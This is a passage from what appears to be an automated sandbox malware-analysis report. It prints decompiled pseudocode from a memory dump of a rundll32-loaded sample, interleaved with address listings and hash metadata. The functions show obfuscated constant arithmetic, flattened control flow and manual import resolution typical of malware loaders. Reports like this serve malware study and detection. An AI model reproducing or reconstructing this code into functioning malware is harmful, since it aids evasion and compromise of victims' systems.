				_v80 = _v80 >> 6;
				_v80 = _v80 ^ 0xc023484e;
				_v80 = _v80 / _t158;
				_v80 = _v80 ^ 0x155df6ec;
				_v72 = 0x4bfcfc;
				_v72 = _v72 | 0x0a339af0;
				_v72 = _v72 << 0xf;
				_t159 = 0x12;
				_v72 = _v72 / _t159;
				_v72 = _v72 ^ 0x0e3e5ce5;
				_v40 = 0xc0630c;
				_v40 = _v40 | 0x5d0d844d;
				_v40 = _v40 ^ 0x5dc4e99c;
				_v52 = 0x98b7b;
				_v52 = _v52 + 0xa105;
				_v52 = _v52 >> 5;
				_v52 = _v52 ^ 0x0004c78d;
				_v56 = 0xd0814a;
				_v56 = _v56 >> 9;
				_v56 = _v56 * 0x3e;
				_v56 = _v56 ^ 0x001a31dc;
				_v60 = 0xb9e1cb;
				_v60 = _v60 * 0x25;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x768204a8;
				_v48 = 0xccd34a;
				_v48 = _v48 + 0xffff20ce;
				_v48 = _v48 ^ 0x00ce4dff;
				do {
					while(_t137 != 0x8f26e2d) {
						if(_t137 == 0xc99b7e9) {
							_t137 = 0x8f26e2d;
							continue;
						} else {
							if(_t137 != 0xfe1ef29) {
								goto L10;
							} else {
								_t133 =  *0x393dfc; // 0x0
								E0038E274(_v72, _v40, _t137,  *_t135,  *((intOrPtr*)(_t135 + 4)), _v44, _v52, _v56, _v60, _t137,  *((intOrPtr*)(_t133 + 0x40)), _v48,  &_v36);
								_t155 =  ==  ? 1 : _t155;
							}
						}
						L5:
						return _t155;
					}
					_push( *_t154);
					_t130 = E0038AE6D(_v76,  &_v36,  *((intOrPtr*)(_t154 + 4)), _v64, _t137, _v80);
					_t162 = _t162 + 0x14;
					if(_t130 == 0) {
						_t137 = 0xeaa5f76;
						goto L10;
					} else {
						_t137 = 0xfe1ef29;
						continue;
					}
					goto L5;
					L10:
				} while (_t137 != 0xeaa5f76);
				goto L5;
			}



























                                                                                                                                                            0x0037aeff
                                                                                                                                                            0x0037af06
                                                                                                                                                            0x0037af0a
                                                                                                                                                            0x0037af0c
                                                                                                                                                            0x0037af0d
                                                                                                                                                            0x0037af11
                                                                                                                                                            0x0037af15
                                                                                                                                                            0x0037af16
                                                                                                                                                            0x0037af17
                                                                                                                                                            0x0037af1c
                                                                                                                                                            0x0037af24
                                                                                                                                                            0x0037af27
                                                                                                                                                            0x0037af31
                                                                                                                                                            0x0037af39
                                                                                                                                                            0x0037af3b
                                                                                                                                                            0x0037af43
                                                                                                                                                            0x0037af48
                                                                                                                                                            0x0037af4d
                                                                                                                                                            0x0037af58
                                                                                                                                                            0x0037af5d
                                                                                                                                                            0x0037af63
                                                                                                                                                            0x0037af6b
                                                                                                                                                            0x0037af73
                                                                                                                                                            0x0037af7d
                                                                                                                                                            0x0037af80
                                                                                                                                                            0x0037af84
                                                                                                                                                            0x0037af8c
                                                                                                                                                            0x0037af94
                                                                                                                                                            0x0037afa4
                                                                                                                                                            0x0037afad
                                                                                                                                                            0x0037afb0
                                                                                                                                                            0x0037afb4
                                                                                                                                                            0x0037afbc
                                                                                                                                                            0x0037afc4
                                                                                                                                                            0x0037afc9
                                                                                                                                                            0x0037afd9
                                                                                                                                                            0x0037afdd
                                                                                                                                                            0x0037afe5
                                                                                                                                                            0x0037afed
                                                                                                                                                            0x0037aff5
                                                                                                                                                            0x0037affe
                                                                                                                                                            0x0037b001
                                                                                                                                                            0x0037b005
                                                                                                                                                            0x0037b00d
                                                                                                                                                            0x0037b015
                                                                                                                                                            0x0037b01d
                                                                                                                                                            0x0037b025
                                                                                                                                                            0x0037b02d
                                                                                                                                                            0x0037b035
                                                                                                                                                            0x0037b03a
                                                                                                                                                            0x0037b042
                                                                                                                                                            0x0037b04a
                                                                                                                                                            0x0037b054
                                                                                                                                                            0x0037b058
                                                                                                                                                            0x0037b060
                                                                                                                                                            0x0037b06d
                                                                                                                                                            0x0037b071
                                                                                                                                                            0x0037b076
                                                                                                                                                            0x0037b083
                                                                                                                                                            0x0037b08b
                                                                                                                                                            0x0037b093
                                                                                                                                                            0x0037b09b
                                                                                                                                                            0x0037b09b
                                                                                                                                                            0x0037b0a5
                                                                                                                                                            0x0037b101
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b0a7
                                                                                                                                                            0x0037b0ad
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b0b3
                                                                                                                                                            0x0037b0bc
                                                                                                                                                            0x0037b0e3
                                                                                                                                                            0x0037b0f4
                                                                                                                                                            0x0037b0f4
                                                                                                                                                            0x0037b0ad
                                                                                                                                                            0x0037b0f8
                                                                                                                                                            0x0037b100
                                                                                                                                                            0x0037b100
                                                                                                                                                            0x0037b105
                                                                                                                                                            0x0037b11b
                                                                                                                                                            0x0037b120
                                                                                                                                                            0x0037b125
                                                                                                                                                            0x0037b131
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b127
                                                                                                                                                            0x0037b127
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b127
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037b136
                                                                                                                                                            0x0037b136
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: #@Z$_`
                                                                                                                                                            • API String ID: 0-2586238014
                                                                                                                                                            • Opcode ID: b898d7bdf645e710b9d03d92e66f1abc8df98a289cfb113607ae668b807a0569
                                                                                                                                                            • Instruction ID: 4bef66bcfe75f8d45c2f4ea589111bd74b81ae22c4b78a5225bc47a621d43aba
                                                                                                                                                            • Opcode Fuzzy Hash: b898d7bdf645e710b9d03d92e66f1abc8df98a289cfb113607ae668b807a0569
                                                                                                                                                            • Instruction Fuzzy Hash: 815113721083009FC719CF62C88A81BFBE5FBD8758F549A1DF59A96260C376CA49CF46
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 0037DFF3 Relevance: 2.6, Strings: 2, Instructions: 135COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 96%
                                                                                                                                                            			E0037DFF3() {
				signed int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				intOrPtr _t128;
				intOrPtr _t131;
				signed int _t133;
				signed int _t134;
				intOrPtr _t135;
				void* _t143;
				void* _t146;
				signed int* _t148;

				_t148 =  &_v52;
				_v12 = 0xa1a716;
				_v12 = _v12 + 0x2188;
				_v12 = _v12 ^ 0x00a02056;
				_v32 = 0x472a3;
				_v32 = _v32 + 0x22e5;
				_v32 = _v32 ^ 0xff9fab52;
				_v32 = _v32 ^ 0xff9c5b0a;
				_v48 = 0x9a7516;
				_v48 = _v48 + 0xffff4702;
				_v48 = _v48 * 0x45;
				_v48 = _v48 + 0xffff2ff5;
				_t146 = 0x4903f33;
				_v48 = _v48 ^ 0x296ff1ed;
				_v16 = 0xfa3b71;
				_v16 = _v16 << 9;
				_v16 = _v16 ^ 0xf47f6bba;
				_v20 = 0xc0b9b;
				_t133 = 0x7b;
				_v20 = _v20 * 0x52;
				_v20 = _v20 ^ 0x03d2ca7d;
				_v36 = 0x400b3e;
				_v36 = _v36 ^ 0xba288636;
				_v36 = _v36 ^ 0xc4c376ba;
				_v36 = _v36 ^ 0x7eaacb92;
				_v52 = 0x3419b2;
				_v52 = _v52 / _t133;
				_v52 = _v52 >> 0xc;
				_v52 = _v52 | 0xcef26f8a;
				_v52 = _v52 ^ 0xcef1d6cf;
				_v4 = 0xb26f64;
				_t134 = 3;
				_v4 = _v4 / _t134;
				_v4 = _v4 ^ 0x003ff5cc;
				_v40 = 0x34a33d;
				_v40 = _v40 >> 4;
				_v40 = _v40 ^ 0xd21b54bd;
				_v40 = _v40 ^ 0x33ae4ce0;
				_v40 = _v40 ^ 0xe1b00bb7;
				_v8 = 0x4c76b4;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x013e4034;
				_v24 = 0x1c9e42;
				_v24 = _v24 ^ 0x4f10b4b5;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0xf0cd9088;
				_v44 = 0xfe69b1;
				_v44 = _v44 >> 0xd;
				_v44 = _v44 * 0x49;
				_v44 = _v44 * 0x7d;
				_v44 = _v44 ^ 0x011db47c;
				_v28 = 0x46ec28;
				_v28 = _v28 << 9;
				_v28 = _v28 * 0x58;
				_v28 = _v28 ^ 0xc2551a85;
				_t135 =  *0x393e0c; // 0x0
				do {
					while(_t146 != 0x4903f33) {
						if(_t146 == 0x6f617aa) {
							_t128 = E003746BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E003781B7, _v28);
							_t135 =  *0x393e0c; // 0x0
							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
						} else {
							if(_t146 != 0xc69f0b3) {
								goto L6;
							} else {
								_t131 = E00377AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
								_t135 =  *0x393e0c; // 0x0
								_t148 =  &(_t148[6]);
								_t146 = 0x6f617aa;
								 *((intOrPtr*)(_t135 + 8)) = _t131;
								continue;
							}
						}
						L9:
						return 0 | _t135 != 0x00000000;
					}
					_push(_t135);
					_push(_t135);
					_t143 = 0x24;
					_t135 = E00377FF2(_t143);
					_t146 = 0xc69f0b3;
					 *0x393e0c = _t135;
					L6:
				} while (_t146 != 0xab42793);
				goto L9;
			}
























                                                                                                                                                            0x0037dff3
                                                                                                                                                            0x0037dff6
                                                                                                                                                            0x0037e000
                                                                                                                                                            0x0037e008
                                                                                                                                                            0x0037e010
                                                                                                                                                            0x0037e018
                                                                                                                                                            0x0037e020
                                                                                                                                                            0x0037e028
                                                                                                                                                            0x0037e030
                                                                                                                                                            0x0037e038
                                                                                                                                                            0x0037e049
                                                                                                                                                            0x0037e052
                                                                                                                                                            0x0037e05a
                                                                                                                                                            0x0037e05c
                                                                                                                                                            0x0037e069
                                                                                                                                                            0x0037e076
                                                                                                                                                            0x0037e07b
                                                                                                                                                            0x0037e083
                                                                                                                                                            0x0037e092
                                                                                                                                                            0x0037e095
                                                                                                                                                            0x0037e099
                                                                                                                                                            0x0037e0a1
                                                                                                                                                            0x0037e0a9
                                                                                                                                                            0x0037e0b1
                                                                                                                                                            0x0037e0b9
                                                                                                                                                            0x0037e0c1
                                                                                                                                                            0x0037e0d1
                                                                                                                                                            0x0037e0d5
                                                                                                                                                            0x0037e0da
                                                                                                                                                            0x0037e0e2
                                                                                                                                                            0x0037e0ea
                                                                                                                                                            0x0037e0f6
                                                                                                                                                            0x0037e0f9
                                                                                                                                                            0x0037e0fd
                                                                                                                                                            0x0037e105
                                                                                                                                                            0x0037e10d
                                                                                                                                                            0x0037e112
                                                                                                                                                            0x0037e11a
                                                                                                                                                            0x0037e122
                                                                                                                                                            0x0037e12a
                                                                                                                                                            0x0037e132
                                                                                                                                                            0x0037e137
                                                                                                                                                            0x0037e13f
                                                                                                                                                            0x0037e147
                                                                                                                                                            0x0037e14f
                                                                                                                                                            0x0037e154
                                                                                                                                                            0x0037e15c
                                                                                                                                                            0x0037e164
                                                                                                                                                            0x0037e16e
                                                                                                                                                            0x0037e177
                                                                                                                                                            0x0037e17b
                                                                                                                                                            0x0037e183
                                                                                                                                                            0x0037e18b
                                                                                                                                                            0x0037e195
                                                                                                                                                            0x0037e199
                                                                                                                                                            0x0037e1a1
                                                                                                                                                            0x0037e1a7
                                                                                                                                                            0x0037e1a7
                                                                                                                                                            0x0037e1ad
                                                                                                                                                            0x0037e229
                                                                                                                                                            0x0037e22e
                                                                                                                                                            0x0037e237
                                                                                                                                                            0x0037e1af
                                                                                                                                                            0x0037e1b1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e1b3
                                                                                                                                                            0x0037e1c6
                                                                                                                                                            0x0037e1cb
                                                                                                                                                            0x0037e1d1
                                                                                                                                                            0x0037e1d4
                                                                                                                                                            0x0037e1d6
                                                                                                                                                            0x00000000
                                                                                                                                                            0x0037e1d6
                                                                                                                                                            0x0037e1b1
                                                                                                                                                            0x0037e23b
                                                                                                                                                            0x0037e248
                                                                                                                                                            0x0037e248
                                                                                                                                                            0x0037e1e7
                                                                                                                                                            0x0037e1e8
                                                                                                                                                            0x0037e1eb
                                                                                                                                                            0x0037e1f3
                                                                                                                                                            0x0037e1f5
                                                                                                                                                            0x0037e1f7
                                                                                                                                                            0x0037e1fd
                                                                                                                                                            0x0037e1fd
                                                                                                                                                            0x00000000

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: (F$"
                                                                                                                                                            • API String ID: 0-1034852068
                                                                                                                                                            • Opcode ID: e25e782e998fe1db7c0f61b300ee240100d3e345bd9c4a508e1ffffb108ad4bd
                                                                                                                                                            • Instruction ID: 5e3c61ae50a852e60b61030cd418557e02424fc2330798f7744d7479c51daeea
                                                                                                                                                            • Opcode Fuzzy Hash: e25e782e998fe1db7c0f61b300ee240100d3e345bd9c4a508e1ffffb108ad4bd
                                                                                                                                                            • Instruction Fuzzy Hash: 7F51447140D3019FC359CF25D98A80FBBE1EB88758F50891DF599AA260D3B5DA09CF87
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00377C37 Relevance: 2.6, Strings: 2, Instructions: 122COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 92%
                                                                                                                                                            			E00377C37(void* __ecx, void* __edx) {
				void* _t91;
				void* _t102;
				signed short _t108;
				signed short _t111;
				signed short _t113;
				signed int _t115;
				signed int _t116;
				signed int _t117;
				signed short _t121;
				intOrPtr _t128;
				signed short* _t132;
				signed short _t133;
				intOrPtr _t134;
				void* _t135;
				void* _t136;

				_t134 =  *((intOrPtr*)(_t135 + 0x30));
				_push(_t134);
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push( *((intOrPtr*)(_t135 + 0x38)));
				_push(__edx);
				_push(__ecx);
				E003820B9(_t91);
				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
				_t136 = _t135 + 0x14;
				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
				_t115 = 0x47;
				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
				 *(_t136 + 0x28) = 0x411077;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
				 *(_t136 + 0x14) = 0x6ab109;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
				 *(_t136 + 0x3c) = 0x583f0;
				_t116 = 0x13;
				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
				 *(_t136 + 0x28) = 0xeb6063;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
				 *(_t136 + 0x20) = 0x8f08a1;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
				 *(_t136 + 0x1c) = 0x46d0e7;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
				 *(_t136 + 0x14) = 0x9e0f5b;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
				_t117 =  *(_t136 + 0x18);
				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
					L13:
					return 1;
				} else {
					_t133 = _t128 + _t134;
					while(1) {
						_t105 =  *((intOrPtr*)(_t133 + 0xc));
						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
							goto L13;
						}
						_t121 = E0038CADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
						 *(_t136 + 0x18) = _t121;
						__eflags = _t121;
						if(_t121 == 0) {
							L15:
							return 0;
						}
						_t132 =  *_t133 + _t134;
						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
						while(1) {
							_t108 =  *_t132;
							__eflags = _t108;
							if(__eflags == 0) {
								break;
							}
							if(__eflags >= 0) {
								_t110 = _t108 + 2 + _t134;
								__eflags = _t108 + 2 + _t134;
							} else {
								_t110 = _t108 & 0x0000ffff;
							}
							_t111 = E00376CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
							_t136 = _t136 + 0x10;
							__eflags = _t111;
							if(_t111 == 0) {
								goto L15;
							} else {
								_t121 =  *(_t136 + 0x18);
								_t132 =  &(_t132[2]);
								 *_t113 = _t111;
								_t113 = _t113 + 4;
								__eflags = _t113;
								continue;
							}
						}
						_t133 = _t133 + 0x14;
						__eflags = _t133;
					}
					goto L13;
				}
			}


















                                                                                                                                                            0x00377c3c
                                                                                                                                                            0x00377c42
                                                                                                                                                            0x00377c43
                                                                                                                                                            0x00377c47
                                                                                                                                                            0x00377c4b
                                                                                                                                                            0x00377c4c
                                                                                                                                                            0x00377c4d
                                                                                                                                                            0x00377c52
                                                                                                                                                            0x00377c5a
                                                                                                                                                            0x00377c5d
                                                                                                                                                            0x00377c6e
                                                                                                                                                            0x00377c71
                                                                                                                                                            0x00377c75
                                                                                                                                                            0x00377c7d
                                                                                                                                                            0x00377c8d
                                                                                                                                                            0x00377c91
                                                                                                                                                            0x00377c99
                                                                                                                                                            0x00377ca1
                                                                                                                                                            0x00377ca9
                                                                                                                                                            0x00377cb1
                                                                                                                                                            0x00377cb9
                                                                                                                                                            0x00377cc1
                                                                                                                                                            0x00377ccd
                                                                                                                                                            0x00377cd0
                                                                                                                                                            0x00377cd4
                                                                                                                                                            0x00377ce1
                                                                                                                                                            0x00377ce5
                                                                                                                                                            0x00377ced
                                                                                                                                                            0x00377cf5
                                                                                                                                                            0x00377cfa
                                                                                                                                                            0x00377d02
                                                                                                                                                            0x00377d0a
                                                                                                                                                            0x00377d12
                                                                                                                                                            0x00377d17
                                                                                                                                                            0x00377d1f
                                                                                                                                                            0x00377d27
                                                                                                                                                            0x00377d31
                                                                                                                                                            0x00377d35
                                                                                                                                                            0x00377d3d
                                                                                                                                                            0x00377d4a
                                                                                                                                                            0x00377d4e
                                                                                                                                                            0x00377d56
                                                                                                                                                            0x00377d5b
                                                                                                                                                            0x00377d66
                                                                                                                                                            0x00377d6a
                                                                                                                                                            0x00377d6c
                                                                                                                                                            0x00377d72
                                                                                                                                                            0x00377df1
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377d7b
                                                                                                                                                            0x00377d7b
                                                                                                                                                            0x00377dea
                                                                                                                                                            0x00377dea
                                                                                                                                                            0x00377def
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377d96
                                                                                                                                                            0x00377d98
                                                                                                                                                            0x00377d9c
                                                                                                                                                            0x00377d9e
                                                                                                                                                            0x00377dfc
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377dfc
                                                                                                                                                            0x00377da5
                                                                                                                                                            0x00377da7
                                                                                                                                                            0x00377de1
                                                                                                                                                            0x00377de1
                                                                                                                                                            0x00377de3
                                                                                                                                                            0x00377de5
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377dab
                                                                                                                                                            0x00377db5
                                                                                                                                                            0x00377db5
                                                                                                                                                            0x00377dad
                                                                                                                                                            0x00377dad
                                                                                                                                                            0x00377dad
                                                                                                                                                            0x00377dc9
                                                                                                                                                            0x00377dce
                                                                                                                                                            0x00377dd1
                                                                                                                                                            0x00377dd3
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377dd5
                                                                                                                                                            0x00377dd5
                                                                                                                                                            0x00377dd9
                                                                                                                                                            0x00377ddc
                                                                                                                                                            0x00377dde
                                                                                                                                                            0x00377dde
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377dde
                                                                                                                                                            0x00377dd3
                                                                                                                                                            0x00377de7
                                                                                                                                                            0x00377de7
                                                                                                                                                            0x00377de7
                                                                                                                                                            0x00000000
                                                                                                                                                            0x00377dea

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
                                                                                                                                                            • String ID: X^wE$c`
                                                                                                                                                            • API String ID: 0-1321574684
                                                                                                                                                            • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                                            • Instruction ID: 9dad3683c3b536e7bc2c46d96a7959ff7fe4c7800d874ca350df9c62cac133ed
                                                                                                                                                            • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                                            • Instruction Fuzzy Hash: 895184715083429FC729DF24D88692BBBE1FFC4358F11881DF49A96221E375DA49CF92
                                                                                                                                                            Uniqueness

                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                            Function 00374C5D Relevance: 2.6, Strings: 2, Instructions: 98COMMONCrypto
                                                                                                                                                            Download Yara Rule
                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                            			E00374C5D(intOrPtr _a4) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				void* _t106;
				void* _t108;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t128;

				_v44 = _v44 & 0x00000000;
				_v48 = 0xad4f7a;
				_v16 = 0xf18dbd;
				_v16 = _v16 + 0xffff4795;
				_v16 = _v16 << 0xe;
				_v16 = _v16 >> 6;
				_v16 = _v16 ^ 0x00dff17e;
				_v12 = 0xaf5949;
				_v12 = _v12 | 0xe2d389df;
				_v12 = _v12 + 0x286;
				_t112 = 3;
				_v12 = _v12 / _t112;
				_v12 = _v12 ^ 0x4ba32b72;
				_v24 = 0x2aefd1;
				_t113 = 0x7d;
				_t128 = _a4;
				_v24 = _v24 * 0x59;
				_v24 = _v24 << 2;
				_v24 = _v24 ^ 0x3bb9ca43;
				_v8 = 0x985427;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x713a2c3c;
				_v8 = _v8 | 0x45eb1ca3;
				_v8 = _v8 ^ 0x77f5f6d4;
				_v28 = 0xa7f2b4;
				_v28 = _v28 >> 0xc;
				_v28 = _v28 + 0x7e4a;
				_v28 = _v28 ^ 0x000cc7a8;
				_v40 = 0x7087c6;
				_t114 = 0x69;
				_v40 = _v40 / _t113;
				_v40 = _v40 ^ 0x00014835;
				_v20 = 0xcde00b;
				_v20 = _v20 + 0xffffcf30;
				_v20 = _v20 | 0xcdf6f1c4;
				_v20 = _v20 + 0xfc2b;
				_v20 = _v20 ^ 0xce0272c5;
				_v36 = 0x30875a;
				_v36 = _v36 * 0x47;
				_v36 = _v36 / _t114;
				_v36 = _v36 ^ 0x0028facf;
				_v32 = 0x6c449b;
				_v32 = _v32 >> 0xf;
				_v32 = _v32 + 0xffff12fc;
				_v32 = _v32 ^ 0xfff19483;
				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
				_t134 = _t106;
				if(_t106 != 0) {
					_push(_v8);
					_push(_v24);
					_push(_v12);
					_t108 = E00388606(_v16, 0x371378, _t134);
					_push(_v20);
					_t130 = _t108;
					_push(_t108);
					_push(_v40);
					_t109 = E0037CBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
					if(_t109 != 0) {
						 *_t109();
					}
					E0037A8B0(_v36, _t130, _v32);
				}
				return 0;
			}





















                                                                                                                                                            0x00374c63
                                                                                                                                                            0x00374c69
                                                                                                                                                            0x00374c70
                                                                                                                                                            0x00374c77
                                                                                                                                                            0x00374c7e
                                                                                                                                                            0x00374c82
                                                                                                                                                            0x00374c86
                                                                                                                                                            0x00374c8d
                                                                                                                                                            0x00374c94
                                                                                                                                                            0x00374c9b
                                                                                                                                                            0x00374ca8
                                                                                                                                                            0x00374cad
                                                                                                                                                            0x00374cb2
                                                                                                                                                            0x00374cb9
                                                                                                                                                            0x00374cc4
                                                                                                                                                            0x00374cc7
                                                                                                                                                            0x00374cca
                                                                                                                                                            0x00374ccd
                                                                                                                                                            0x00374cd1
                                                                                                                                                            0x00374cd8
                                                                                                                                                            0x00374cdf
                                                                                                                                                            0x00374ce3
                                                                                                                                                            0x00374cea
                                                                                                                                                            0x00374cf1
                                                                                                                                                            0x00374cf8
                                                                                                                                                            0x00374cff
                                                                                                                                                            0x00374d03
                                                                                                                                                            0x00374d0a
                                                                                                                                                            0x00374d11
                                                                                                                                                            0x00374d1d
                                                                                                                                                            0x00374d1e
                                                                                                                                                            0x00374d23
                                                                                                                                                            0x00374d2a
                                                                                                                                                            0x00374d31
                                                                                                                                                            0x00374d38
                                                                                                                                                            0x00374d3f
                                                                                                                                                            0x00374d46
                                                                                                                                                            0x00374d4d
                                                                                                                                                            0x00374d5c
                                                                                                                                                            0x00374d64
                                                                                                                                                            0x00374d67
                                                                                                                                                            0x00374d6e
                                                                                                                                                            0x00374d75
                                                                                                                                                            0x00374d79
                                                                                                                                                            0x00374d80
                                                                                                                                                            0x00374d8a
                                                                                                                                                            0x00374d8d
                                                                                                                                                            0x00374d8f
                                                                                                                                                            0x00374d92
                                                                                                                                                            0x00374d9a
                                                                                                                                                            0x00374d9d
                                                                                                                                                            0x00374da3
                                                                                                                                                            0x00374da8
                                                                                                                                                            0x00374dab
                                                                                                                                                            0x00374dad
                                                                                                                                                            0x00374dae
                                                                                                                                                            0x00374db7
                                                                                                                                                            0x00374dc1
                                                                                                                                                            0x00374dc3
                                                                                                                                                            0x00374dc3
                                                                                                                                                            0x00374dcd
                                                                                                                                                            0x00374dd3
                                                                                                                                                            0x00374dda

                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000009.00000002.492028130.0000000000371000.00000020.00000800.00020000.00000000.sdmp, Offset: 00370000, based on PE: true
                                                                                                                                                            • Associated: 00000009.00000002.492020139.0000000000370000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            • Associated: 00000009.00000002.492071088.0000000000393000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_9_2_370000_rundll32.jbxd
                                                                                                                                                            Yara matches
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID:
